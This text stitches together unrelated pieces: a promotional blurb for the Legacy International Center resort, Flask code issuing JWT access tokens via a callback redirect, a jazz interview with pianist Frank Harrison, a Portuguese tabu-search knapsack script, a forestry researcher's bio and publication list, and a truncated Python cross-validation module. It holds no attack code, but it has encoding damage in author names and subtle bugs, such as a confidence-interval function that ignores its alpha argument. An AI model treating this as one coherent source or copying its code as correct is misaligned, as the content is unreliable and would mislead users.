“The Legacy International Center is being created for you. No matter what your background, culture, or beliefs, Legacy will bring you a one-of-a-kind experience that you will never forget,” says Dr. Morris Cerullo.
Dr. Cerullo, affectionately known as “Papa” to millions across the globe who have been touched by his decades of personal ministry, is known for his outreaches to the people in 400 cities, in 93 nations, on 7 continents over the past 70-plus years.
The Legacy International Center is an 18-acre luxury resort located in the heart of Mission Valley, in San Diego, California, and is scheduled to open in November 2019. |
import validators
import jwt
import datetime
import urllib
from flask import request, jsonify, redirect, url_for, flash
from flask_login import current_user, login_required
from pepper import settings
from pepper.utils import get_default_dashboard_for_role
# sends an access token to the callback provided by the url
@login_required
def auth():
app_id = request.args.get('app_id')
callback = request.args.get('callback')
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
elif callback is None or not validators.url(callback):
return jsonify({'error': 'Invalid callback provided'}), 422
elif current_user.status == 'NEW':
flash('You must finish registering before starting the puzzle challenge', 'warning')
return redirect(url_for(get_default_dashboard_for_role()))
else:
access_token = {'t': jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=120),
'id': current_user.id, 'fname': current_user.fname, 'lname': current_user.lname}, settings.TOKEN_SEED, algorithm='HS256')}
return redirect(callback + "?" + urllib.urlencode(access_token))
# returns the current user's full name and database id
def get_user_info():
app_id = request.args.get('app_id')
access_token = request.args.get('t') #token
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
try:
decoded = jwt.decode(access_token, settings.TOKEN_SEED, algorithms=['HS256'])
return jsonify({'fname': decoded['fname'], 'lname': decoded['lname'], 'id': decoded['id']})
except jwt.ExpiredSignatureError:
return jsonify({'error': 'Token expired'}), 422
except jwt.InvalidTokenError:
return jsonify({'error': 'Token validation failed'}), 422
except jwt.DecodeError:
return jsonify({'error': 'Token cannot be decoded'}), 422
except jwt.InvalidSignatureError:
return jsonify({'error': 'Token has invalid signature'}), 422
|
LondonJazz News: What drew you first to the piano?
Frank Harrison: My sister was taking piano lessons so we had an old Victorian upright in the house. One holiday when I was 11 we listened to a lot of Billie Holiday, and I really liked the melodies and harmonies in those tunes. So when I got home I started trying to figure them out.
LJN: Who was the teacher who left the biggest mark on you?
FH: Peter Pettinger. He was a great classical pianist but also loved jazz. He introduced me to Bill Evans (of whom he wrote a brilliant biography) and that was a big revelation. Although he knew a lot of jazz theory, he took Bill’s attitude towards tuition: that you can show someone some chords, or a melodic or rhythmic idea, but then they’re just borrowing it from you. But if you let them find it for themselves, it’s theirs. So we talked about bigger things – the sound you get from the instrument, the overall shape of a solo. He taught me to focus on those things rather than on individual notes.
LJN: Was there a sequence in the way you got to know jazz after that?
FH: Yes – actually from Billie Holiday onwards I worked pretty much chronologically. I needed to hear each movement of jazz before I understood the next. I remember loving Blue Trane but hating A Love Supreme! Since then I feel like my musical life has been about removing those set ideas about what I like and don’t like, and becoming open to more and more music.
LJN: When I hear your playing I always find there is a strong melodic line and logic. Is that something that’s important to you?
FH: Yes. I try to play what I hear rather than what my conscious brain might come up with. I think that way you’re more in tune with the listener too – if you want a break in the line, they’re probably ready for one too. I think that’s something that Peter instilled in me from early on.
LJN: You’re a pianist of choice in a number of other bands, right?
FH: I guess so! I’ve got a few projects on the go at the moment. I’ve been playing with Gilad Atzmon’s Orient House Ensemble for fourteen years now and we’ll be touring a new album from January. I think it’s our strongest one so far. And I’ve just finished a tour with the Sirkis/Bialis International Quartet, which was a great experience. Asaf and Sylwia wrote some very deep music for that band, it’s unlike anything else I’ve played or heard. Now I’m starting a tour with Tommaso Starace playing music he composed for the photos of Gianni Berengo Gardin. It’s great – very melodic, and with a lot of humour. And I’ve got a new duo album with singer Edith van den Heuvel about to come out. I’m really happy with that one, it’s very intimate and beautifully recorded.
LJN: How long have you been working with Enzo Zirilli and Dave Whitford?
FH: We started playing together a couple of years ago. They’re both incredibly inspiring musicians to work with. Enzo kind of fits into Louis Armstrong’s definition of jazz: he never plays the same way once. He’s always improvising, always searching, and finds some very beautiful and unusual places. Dave is my ideal bass player. He’s got a perfect balance of rooting things when they need to be rooted, combined with a lot of freedom. Like Enzo, there’s no ego there – he just listens and plays what needs to be played.
LJN: How is this album is different from your others?
FH: The biggest difference is that it’s live! Our previous albums have always involved a lot of preparation, finding the right studio, writing and rehearsing the music… This one was never intended to be an album. We were on tour promoting our Lunaris album and I stuck my digital recorder on stage just to have my own record of what we were doing. But when I listened back to our gig at The Verdict in Brighton I heard something that’s very hard to capture in the studio. Playing close together in a great room and to an attentive audience lets you take risks, and - importantly - have fun. You’re not making judgments about what’s happening, you’re not wondering “is this the take”? You’re just listening and responding, so the music really plays itself.
We then spent a day in the studio mastering it – polishing it as much as we could, trying to bring the piano out a bit… The end result isn’t something that ECM would release but there’s something nice and honest about it.
LJN: In what formats are you making it available?
FH: Since it was free to record, I decided to make the MP3 version of the album free to download. But as some people still like physical objects, we also printed a CD with a bonus track.
LJN: What gigs have you got coming up?
FH: We’ve got a couple of gigs in December to celebrate the new album. On the 3rd we’re at the Albion Beatnik in Oxford (the bonus track on the CD was from a gig we did in Oxford). And then on December 12th we’re back at The Verdict in Brighton. We’ll also be doing a London launch in the spring. |
# -*- coding:utf-8 -*-
# Autor: Marcos Castro
# Busca Tabu - Problema da Mochila Inteiro
# Configuração da Mochila
# Objeto (j) 1 2 3 4 5
# Peso (wj) 4 5 7 9 6
# Benefício (pj) 2 2 3 4 4
# Objetivo: Maximizar o benefício de cada elemento
# Função objetivo: f(s) = SOMATORIO[j=1 até n](pj)(sj) - SOMATORIO[j=1 até n](pj)(sj) * max{0, SOMATORIO[j=1 até n](wj)(sj) - b}
# Função objetivo resumida: f(s) = SOMATORIO[j=1 até n](pj)(sj) * [1 - max{0, SOMATORIO[j=1 até n](wj)(sj) - b}]
# Função de vizinhança: alterar apenas um dos bits (como os vizinhos vão ser gerados)
# função para obter o peso de determinada solução
# essa função calcula o somatório do peso
# passa uma solução e a mochila
def obter_peso(solucao, mochila):
peso = 0
for i in range(0, len(solucao)):
peso += solucao[i] * mochila[i][0]
return peso
# função que calcula o valor da função objetivo
# passa uma solução, a mochila e a capacidade máxima da mochila
def obter_avaliacao(solucao, mochila, capacidade_maxima):
somatorio_peso = 0
somatorio_beneficio = 0
for i in range(0, len(solucao)):
somatorio_peso += solucao[i] * mochila[i][0] # mochila[i][0] acessa o peso
somatorio_beneficio += solucao[i] * mochila[i][1] # mochila[i][1] acessa o benefício
avaliacao = somatorio_beneficio * (1 - max(0, somatorio_peso - capacidade_maxima))
return avaliacao
# função para gerar os vizinhos, a vizinhança é gerada trocando o bit
# melhor_solucao - melhor solução corrente
# max_vizinhos - quantidade máxima de vizinhos
def gerar_vizinhos(melhor_solucao, max_vizinhos):
vizinhos = []
pos = 0
for i in range(0, max_vizinhos):
vizinho = []
for j in range(0, len(melhor_solucao)):
if j == pos:
if melhor_solucao[j] == 0:
vizinho.append(1)
else:
vizinho.append(0)
else:
vizinho.append(melhor_solucao[j])
vizinhos.append(vizinho)
pos += 1
return vizinhos
# função para obter o valor de avaliação de cada vizinho
# vizinhos - lista de todos os vizinhos
# mochila - a mochila
# capacidade_maxima - capacidade máxima da mochila
# max_vizinhos - quantidade máxima de vizinhos
def obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos):
vizinhos_avaliacao = []
for i in range(0, max_vizinhos):
vizinhos_avaliacao.append(obter_avaliacao(vizinhos[i], mochila, capacidade_maxima))
return vizinhos_avaliacao
# função para obter o bit modificado
# melhor_solucao - melhor solução corrente
# melhor_vizinho - melhor vizinho
def obter_bit_modificado(melhor_solucao, melhor_vizinho):
for i in range(0, len(melhor_solucao)):
if melhor_solucao[i] != melhor_vizinho[i]:
return i
# função para obter o vizinho com a máxima avaliação
# vizinhos_avaliacao - valor de avaliação de todos os vizinhos
# lista_tabu - lista tabu para proibir determinada modificação de bit
# melhor_solucao - melhor solução corrente
# vizinhos - lista com todos os vizinhos
def obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos):
maxima_avaliacao = max(vizinhos_avaliacao)
pos = 0
bit_proibido = -1
# verifica se a lista tabu não possui elementos
if len(lista_tabu) != 0:
# se possuir, é porque tem bit proibido, então pega esse bit
bit_proibido = lista_tabu[0]
# for para obter a posição do melhor vizinho
for i in range(0, len(vizinhos_avaliacao)):
if vizinhos_avaliacao[i] == maxima_avaliacao:
pos = i
break
# verifico se o vizinho é resultado de movimento proibido
if bit_proibido != -1:
# se for, então obtém a posição do bit que foi modificado para gerar esse vizinho
bit_pos = obter_bit_modificado(melhor_solucao, vizinhos[pos])
# verifica se é um bit que está na lista_tabu (compara com bit_proibido)
if bit_pos == bit_proibido:
# se cair nesse if, então procura o segundo melhor vizinho
melhor_pos = 0
for i in range(1, len(vizinhos_avaliacao)):
if i != bit_pos:
if vizinhos_avaliacao[i] > vizinhos_avaliacao[melhor_pos]:
melhor_pos = i
return melhor_pos # retorna a posição do segundo melhor vizinho
return pos # retorna a posição do melhor vizinho
# configuração da mochila com uma lista de listas
# o primeiro é o peso e o segundo é o benefício
mochila = [[4,2], [5,2], [7,3], [9,4], [6,4]]
iteracao = melhor_iteracao = 0
melhor_solucao = [] # irá guardar a melhor solução
lista_tabu = [] # lista tabu inicialmente vazia
capacidade_maxima = 23 # capacidade máxima da mochila
bt_max = 1 # quantidade máxima de iterações sem melhora no valor da melhor solução
max_vizinhos = 5 # quantidade máxima de vizinhos
# PASSO 0
# gera uma solução inicial aleatória
import random # módulo para gerar números randômicos
# o for abaixo gera 5 vezes os números: 0 ou 1
for i in range(0, 5):
bit = random.randrange(2) # gera números de 0 (inclusive) a 1 (inclusive)
melhor_solucao.append(bit) # adiciona o bit na lista
# mostra a solução inicial e o seu valor de avaliação
print('Solução inicial: {0}, Avaliação: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
# obtém o peso corrente da mochila
peso_corrente = obter_peso(melhor_solucao, mochila)
# obtém a avaliação da melhor_solucao
melhor_avaliacao = obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)
# gera os vizinhos (vizinhança)
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)
# calcula a avaliação de todos os vizinhos
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)
# obtém a posição do melhor vizinho
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# verifica se o melhor vizinho tem avaliação melhor do que a melhor avaliação até o momento
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# obtém o bit que foi modificado do melhor vizinho
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu.append(bit_modificado) # guarda o movimento proibido
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # temos uma solução melhor, faz uma cópia
melhor_iteracao += 1 # incrementa a iteração onde foi achada a melhor solução até o momento
iteracao += 1 # incrementa iteração
# Aqui terminou o PASSO 0, agora iremos entrar em loop (executar os outros passos)
while True:
# a condição de parada é se a diferença da iteração e melhor_iteracao for maior que bt_max
# iteracao é a iteração global (sempre é incrementada)
# melhor_iteracao é a iteração onde se achou a melhor solução (nem sempre é incrementada)
# bt_max é o máximo de iterações sem melhora no valor da melhor solução
if (iteracao - melhor_iteracao) > bt_max:
break
# abaixo temos linhas de código quase idêntico ao PASSO 0
# gerando novos vizinhos, faz uma cópia dos novos vizinhos
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)[:]
# obtém o valor de avaliação de todos os vizinhos (faz uma cópia)
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)[:]
# obtém a posição do melhor vizinho
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# verifica se o melhor vizinho tem avaliação melhor do que a melhor avaliação corrente
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# obtém o bit que foi modificado para gerar o melhor vizinho
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu[0] = bit_modificado # guarda o movimento proibido (Essa linha NÃO existia no Passo 0)
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # temos uma solução melhor, faz uma cópia da lista
melhor_avaliacao = vizinhos_avaliacao[pos_melhor_vizinho] # atualiza a melhor avaliação
melhor_iteracao += 1 # incrementa a iteração onde foi achada a melhor solução (nem sempre é incrementada)
iteracao += 1 # incremento da iteração (sempre é incrementada)
# mostra a solução final e sua avaliação
print('Solução final: {0}, Avaliação: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
print('Melhor iteração: {0}'.format(melhor_iteracao)) # mostra a iteração onde foi achada a melhor solução
print('Iteração: {0}'.format(iteracao)) # mostra a iteração global
|
Contact Ronald S. Zalesny, Jr.
I study genetic and physiological mechanisms regulating biomass production of short rotation woody crops (e.g., poplars and willows) grown for phytotechnologies, bioenergy, and fiber.
The provision of ecosystem services associated with these end uses is tightly linked with increasing human population levels at regional, national, and global scales, resulting in the need for such services along the urban to rural continuum that balance community well-being with ecological health and stability. To address this need, I am advancing short rotation woody crop production systems for pollution remediation and renewable energy.
In addition to short rotation woody crops, I also study the impacts of changing climates on patterns of tree adaptation in northern coniferous forest ecosystems.
There is a need for long-term conifer management strategies that optimize ecosystem services such as carbon sequestration and feedstock production potential of plantations and natural forests. The success of such systems depends upon understanding the linkages among energy, climate, and tree genetics, which are vital for promoting biologically and economically sustainable reforestation, afforestation, and gene conservation.
Understanding the underlying genetic and physiological mechanisms regulating growth and development of short rotation woody crops supports effective deployment of favorable genotypes that helps: 1) reduce impacts from invasive species, 2) provide energy sources that do not contribute to increased atmospheric carbon dioxide (CO2) and global climate change, and 3) improve ecosystems along the urban to rural continuum through recovery, remediation, and restoration. Overall, the knowledge gained from my research helps growers and researchers increase the success of sustainable woody crop production systems, while providing essential ecosystem services such as clean water and healthy soils.
Zalesny Jr., Ronald S.; Stanturf, John A.; Gardiner, Emile S.; Ba??uelos, Gary S.; Hallett, Richard A.; Hass, Amir; Stange, Craig M.; Perdue, James H.; Young, Timothy M.; Coyle, David R.; Headlee, William L. 2016. Environmental technologies of woody crop production systems.
Zalesny Jr., Ronald S.; Stanturf, John A.; Gardiner, Emile S.; Perdue, James H.; Young, Timothy M.; Coyle, David R.; Headlee, William L.; Ba??uelos, Gary S.; Hass, Amir. 2016. Ecosystem services of woody crop production systems.
Lazarus, William; Headlee, William L.; Zalesny, Ronald S., Jr. 2015. Impacts of supplyshed-level differences in productivity and land Costs on the economics of hybrid poplar production in Minnesota, USA.
Zalesny, Ronald S., Jr..; Hallett, Richard A.; Falxa-Raymond, Nancy; Wiese, Adam H.; Birr, Bruce A. 2014. Propagating native Salicaceae for afforestation and restoration in New York City's five boroughs.
Headlee, William L.; Zalesny, Ronald S. Jr.; Donner, Deahn M.; Hall, Richard B. 2013. Using a process-based model (3-PG) to predict and map hybrid poplar biomass productivity in Minnesota and Wisconsin, USA.
Headlee, William L.; Zalesny, Ronald S. Jr.; Hall, Richard B.; Bauer, Edmund O.; Bender, Bradford; Birr, Bruce A.; Miller, Raymond O.; Randall, Jesse A.; Wiese, Adam H. 2013. Specific gravity of hybrid poplars in the north-central region, USA: within-tree variability and site × genotype effects.
Zalesny, Ronald S., Jr..; Donner, Deahn M.; Coyle, David R.; Headlee, William L. 2012. An approach for siting poplar energy production systems to increase productivity and associated ecosystem services.
Zalesny, Ronald S.; Hall, Richard B.; Zalesny, Jill A.; McMahon, Bernard G.; Berguson, William E.; Stanosz, Glen R. 2009. Biomass and Genotype Environment Interactions of Populus Energy Crops in the Midwestern United States.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart; Hall, Richard B. 2008. Sodium and chloride accumulation in leaf, woody, and root tissue of Populus after irrigation with landfill leachate.
Headlee, William L.; Zalesny, Ronald S.; Hall, Richard B. 2018. Coarse root biomass and architecture of hybrid aspen 'Crandon' (Populus alba L. P. grandidenta Michx.) grown in an agroforestry system in central Iowa, USA.
Chhin, Sophan ; Zalesny, Ronald S.; Parker, William C.; Brissette, John . 2018. Dendroclimatic analysis of white pine (Pinus strobus L.) using long-term provenance test sites across eastern North America.
Zalesny, Ronald S., Jr..; Headlee, William L. 2015. Developing woody crops for the enhancement of ecosystem services under changing climates in the north central United States.
Mirck, Jaconette; Zalesny, Ronald S., Jr. 2015. Mini-review of knowledge gaps in salt tolerance of plants applied to willows and poplars.
Headlee, William L.; Hall, Richard B.; Zalesny, Ronald S., Jr. 2013. Establishment of alleycropped hybrid aspen "Crandon" in central Iowa, USA: effects of topographic position and fertilizer rate on above ground biomass production and allocation.
Zalesny, Ronald S., Jr..; Coyle, David R. 2013. Short rotation Populus: a bibliography of North American literature, 1989-2011.
Assibi Mahama, A. ; Hall, Richard ; Zalesny, Ronald . 2011. Differential interspecific incompatibility among Populus hybrids in sections Aigeiros Duby and Tacamahaca Spach.
Zalesny, R. S.; Zalesny, J. A. 2011. Clonal Variation in Lateral and Basal Rooting of Populus Irrigated with Landfill Leachate.
Lazarus, William F.; Tiffany, Douglas G.; Zalesny Jr., Ronald S., Jr..; Riemenschneider, Don E. 2011. Economic impacts of short-rotation woody crops for energy or oriented strand board: a Minnesota case study.
Coyle, David R.; Zalesny, Jill A.; Zalesny Jr., Ronald S., Jr..; Wiese, Adam H. 2011. Irrigating poplar energy crops with landfill leachate negatively affects soil micro- and meso-fauna.
Padley, Eunice A.; Donner, Deahn M.; Fassnacht, Karin S.; Zalesny, Ronald S., Jr..; Birr, Bruce; Martin, Karl J. 2011. Managing carbon sequestration and storage in northern hardwood forests.
Zalesny Jr., Ronald S., Jr..; Stanturf, John A.; Evett, Steven R.; Kandil, Nabil F.; Soriano, Christopher. 2011. Opportunities for woody crop production using treated wastewater in Egypt. I. Afforestation strategies.
Evett, Steven R.; Zalesny Jr., Ronald S., Jr..; Kandil, Nabil F.; Stanturf, John A.; Soriano, Christopher. 2011. Opportunities for woody crop production using treated wastewater in Egypt. II. Irrigation strategies.
Zalesny Jr., R.S., Jr.; Cunningham, M.W.; Hall, R.B.; Mirck, J.; Rockwood, D.L.; Stanturf, J.A.; Volk, T.A. 2011. Woody biomass from short rotation energy crops. Chapter 2.
Coyle, David R.; Zalesny, Jill A.; Zalesny, Ronald S. Jr. 2010. A comprehensive database of poplar research in North America from 1980 - 2010.
Zalesny, R.S. Jr.; Donner, D.M.; Coyle, D.R.; Headlee, W.L.; Hall, R.B. 2010. An approach for siting poplar energy production systems to increase productivity and associated ecosystem services.
Headlee, W.L.; Hall, R.B.; Zalesny, R.S. Jr. 2010. Aspen-triticale alleycropping system: effects of landscape position and fertilizer rate.
Zalesny, R.S. Jr.; Headlee, W.L.; Hall, R.B.; Coyle, D.R. 2010. Carbon sequestration potential of poplar energy crops in the Midwest, USA.
Zalesny, Ronald S. Jr.; Zalesny, Jill A. 2010. Phyto-recurrent selection: a method for selecting Populus and Salix genotypes for environmental applications.
Donner, Deahn; Zalesny, Ron, Jr. 2010. Potential Land-use changes with Woody Energy Corp Production in Wisconsin and Minnesota.
Zhu, J.Y.; Pan, Xuejun; Zalesny, Ronald S. Jr. 2010. Pretreatment of woody biomass for biofuel production: energy efficiency, technologies, and recalcitrance.
Vance, Eric D.; Maguire, Douglas A.; Zalesny, Ronald S. Jr. 2010. Research strategies for increasing productivity of intensively managed forest plantations.
Zalesny Jr., R.S., Jr..; Zalesny, Jill. 2010. Using phytotechnologies to remediate brownfields, landfills, and other urban areas.
Zalesny, Ronald S. Jr.; Zalesny, Jill A. 2010. Using phytotechnologies to remediate brownfields, landfills, and other urban areas.
Zalesny, Ronald S. Jr.; Wiese, Adam H.; Bauer, Edmund O.; Riemenschneider, Donald E. 2009. Ex situ growth and biomass of Populus bioenergy crops irrigated and fertilized with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S. 2009. Chloride and sodium uptake potential over an entire rotation of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, David R.; Hall, Richard B.; Bauer, Edmund O. 2009. Clonal variation in morphology of Populus root systems following irrigation with landfill leachate or water during 2 years of establishment.
Zalesny, Jill A.; Coyle, David R.; Zalesny, Ronald S. Jr.; Wiese, Adam H. 2009. Effects of irrigating poplar energy crops with landfill leachate on soil micro- and meso-fauna.
Zalesny, Ronald S. Jr. 2009. Integrating phytotechnologies with energy crop production for biofuels, bioenergy, and bioproducts.
Zalesny, Ronald S. Jr.; Evett, Steven R.; Kandil, Nabil F.; Soriano, Chris; Stanturf, John A. 2009. Opportunities for woody crop production using treated wastewater in Egypt.
Zalesny, Ronald S., Jr.; Zalesny, Jill A. 2009. Selecting Populus with different adventitious root types for environmental benefits, fiber, and energy.
Mirck, Jaconette; Zalesny, Ronald S. Jr.; Dimitriou, Ioannis; Zalesny, Jill A.; Volk, Timothy A.; Mabee, Warren E. 2009. The use of short rotation willows and poplars for the recycling of saline waste waters.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, David R.; Hall, Richard B.; Bauer, Edmund O. 2008. Populus root system morphology during phytoremediation of landfill leachate.
Zalesny, Ronald S., Jr.; Mitchell, Rob; Richardson, Jim, eds. 2008. Biofuels, bioenergy, and bioproducts from sustainable agricultural and forest crops: proceedings of the short rotation crops international conference.
Zalesny, Ronald S., Jr.; Hall, Richard B.; Zalesny, Jill A.; Berguson, William E.; McMahon, Bernard G.; Stanosz, Glen R. 2008. Biomass potential of populus in the midwestern United States.
Kodrzycki, R.J.; Michaels, R.B.; Friend, A.L.; Zalesny, R.S., Jr..; Mawata, Ch.P.; McDonald, D.W. 2008. Non-destructive digital imaging in poplar allows detailed analysis of adventitious rooting dynamics.
Zalesny, Jill A.; Zalesny, Ronald S., Jr. 2008. Potential chloride and sodium uptake for 2- to 11-year-old populus irrigated with landfill leachate in the north central United States.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart T.; Hall, Richard B. 2008. Uptake of macro- and micro-nutrients into leaf, woody, and root tissue of Populus after irrigation with landfill leachate.
Zalesny, Ronald S., Jr.; Zalesny, Jill A. 2008. Variation in lateral and basal adventitious rooting of populus irrigated with landfill leachate: selection of favorable genotypes for environmental benefits.
Zalesny, Ronald S.; Bauer, Edmund O. 2007. Evaluation of Populus and Salix Continuously Irrigated with Landfill Leachate I. Genotype-Specific Elemental Phytoremediation.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Headlee, William L., Jr.; Hall, Richard B.; Mahama, A. Assibi; Zalesny, Jill A. 2007. An inexpensive and reliable monitoring station design for use with lightweight, compact data loggers.
Mahama, A. Assibi; Zalesny, Ronald S., Jr.; Hall, R.B. 2007. Breeding success and range of incompatibility among Populus hybrids in sections Aigeiros Duby and Tacamahaca Spach.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Hall, Richard B. 2007. Choosing tree genotypes for phytoremediation of landfill leachate using phyto-recurrent selection.
Zalesny, Ronald S., Jr.; Zalesny, Jill A.; Bauer, Edmund O. 2007. Ecological sustainability of alternative biomass feedstock production for environmental benefits and bioenergy.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Zalesny, Jill A. 2007. Establishment and early growth of Populus hybrids irrigated with landfill leachate.
Zalesny, Ronald S., Jr.; Bauer, Edmund O. 2007. Evaluation of Populus and Salix continuously irrigated with landfill leachate II. Soils and early tree development.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, David R.; Hall, Richard B. 2007. Growth and biomass of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, D.R.; Hall, R.B. 2007. Leaf, woody, and root biomass of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart T.; Hall, Richard B. 2007. Macro- and micro-nutrient concentration in leaf, woody, and root tissue of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart T.; Hall, Richard B. 2007. Phytoaccumulation of sodium and chloride into leaf, woody, and root tissue of Populus irrigated with landfill leachate.
Zalesny, Ronald S., Jr.; Bauer, Edmund O. 2007. Selecting and utilizing Populus and Salix for landfill covers: implications for leachate irrigation.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, A.H.; Sexton, B.; Hall, R.B. 2007. Sodium and chloride concentration in leaf, woody, and root tissue of Populus irrigated with landfill leachate.
Zalesny, Ronald S., Jr.; Friend, A. L.; Kodrzycki, B.; McDonald, D.W.; Michaels, R.; Wiese, A.H.; Powers, J.W. 2007. Using low energy x-ray radiography to evaluate root initiation and growth of Populus.
Wiese, Adam H.; Netzer, Daniel A.; Riemenschneider, Don E.; Zalesny, Ronald S., Jr. 2006. A weed compaction roller system for use with mechanical herbicide application.
Coleman, Mark; Zalesny, Ronald S., Jr. 2006. Annotated bibliography on phytoremediation.
Wiese, A.H.; Zalesny, J.A.; Donner, D.M.; Zalesny, Ronald S., Jr. 2006. Bud removal affects shoot, root, and callus development of hardwood Populus cuttings.
Zalesny, R. S., Jr.; Wiese, A.H. 2006. Date of shoot collection, genotype, and original shoot position affect early rooting of dormant hardwood cuttings of Populus.
Mahama, A. Assibi; Zalesny, Ronald S., Jr.; Hall, Richard B. 2006. Differential interspecific incompatibility in Populus breeding.
Zalesny, Ronald S., Jr. 2006. Genetic and environmental factors affecting early rooting of six Populus genomic groups: implications for tree improvement.
Zalesny, Ronald S., Jr.; Bauer, Edmund O. 2006. Phyto-recurrent selection: a tree improvement strategy for selecting genotypes used in phytoremediation.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Hall, Richard B.; Sexton, Bart. 2006. Phytoremediation of landfill leachate using Populus.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Riemenschneider, Don E. 2006. Sapflow of hybrid poplar (Populus nigra L. x P. maximowiczii A. Henry 'NM6') during phytoremediation of landfill leachate.
Mahama, A. Assibi; Sparks, Brian; Zalesny, Ronald S.,, Jr..; Hall, Richard B. 2006. Successful grafting in poplar species (Populus spp.) breeding.
Wiese, Adam H.; Zalesny, Ronald S., Jr. 2006. Unique technical innovations for short rotation woody crops research and development.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Hall, Richard B. 2006. Using phyto-recurrent selection to choose Populus genotypes for phytoremediation of landfill leachate.
Zalesny, Ronald, Jr.; Riemenschneider, Don. 2006. Using short rotation woody crops for bioenergy in North America.
Wiese, Adam H.; Riemenschneider, Don E.; Zalesny, Ronald S., Jr. 2005. An inexpensive rhizotron design for two-dimensional, horizontal root growth measurements.
Zalesny, Ronald S., Jr.; Bauer, Edmund O.; Hall, Richard B.; Zalesny, Jill A.; Kunzman, Joshua; Rog, Chris J.; Riemenschneider, Don E. 2005. Clonal variation in survival and growth of hybrid poplar and willow in an in situ trial on soils heavily contaminated with petroleum hydrocarbons.
Zalesny, Ronald S., Jr.; Riemenschneider, Don E.; Hall, Richard B. 2005. Early rooting of dormant hardwood cuttings of Populus: analysis of quantitative genetics and genotype x environment interactions.
Zalesny, R.S., Jr.; Hall, R.B.; Bauer, E.O.; Riemenschneider, D.E. 2005. Soil temperature and precipitation affect the rooting ability of dormant hardwood cuttings of Populus.
Zalesny, Ronald S., Jr. 2004. Hybrid poplars: fast-growing, disease-resistant species has multiple uses.
Zalesny, R.S., Jr.; Bauer, E.O.; Riemenschneider, D.E. 2004. Use of belowground growing degree days to predict rooting of dormant hardwood cuttings of Populus.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Riemenschneider, Don E.; Sexton, Bart. 2004. Water usage and establishment success of Populus during phytoremediation of landfill effluent.
Zalesny, R.S., Jr.; Hall, R.B.; Bauer, E.O.; Riemenschneider, D.E. 2003. Shoot position affects root initiation and growth of dormant unrooted cuttings of Populus.
Zalesny, Ronald S., Jr.; Riemenschneider, Don E.; Hall, Richard B. 2002. Evaluating hybrid poplar rooting. I. genotype x environment interactions in three contrasting sites.
Zalesny, Ronald S., Jr.; Riemenschneider, Don E.; Hall, Richard B. 2002. Evaluating hybrid poplar rooting. II. backcross breeding method exhibits exceptional promise.
Zalesny, Ronald S., Jr.; Riemenschneider, Don; Bauer, Edmund. 2000. Analysis of genetic and environmental effects on hybrid poplar rooting in Central and Northern Minnesota, USA. |
# -*- coding: UTF-8 -*-
"""
This module defines an evaluation framework for performing cross-validation experiments with the implemented classifiers.
"""
from datetime import datetime
from math import sqrt
from sklearn.cross_validation import KFold
from scipy import stats as scipy_stats
import pandas
import numpy
from evaluation import plot
from evaluation.metrics import QualityMetricsCalculator, runtime_metrics, quality_metrics
calculated_stats = ["Mean", "Std deviation", "Confidence interval"]
def delta_in_ms(delta):
"""
Convert a timedelta object to milliseconds.
"""
return delta.seconds*1000.0+delta.microseconds/1000.0
def confidence_interval(data, alpha=0.1):
"""
Calculate the confidence interval for each column in a pandas dataframe.
@param data: A pandas dataframe with one or several columns.
@param alpha: The confidence level, by default the 90% confidence interval is calculated.
@return: A series where each entry contains the confidence-interval for the corresponding column.
"""
alpha = 0.1
t = lambda column: scipy_stats.t.isf(alpha/2.0, len(column)-1)
width = lambda column: t(column) * numpy.std(column.values, ddof=1)/sqrt(len(column))
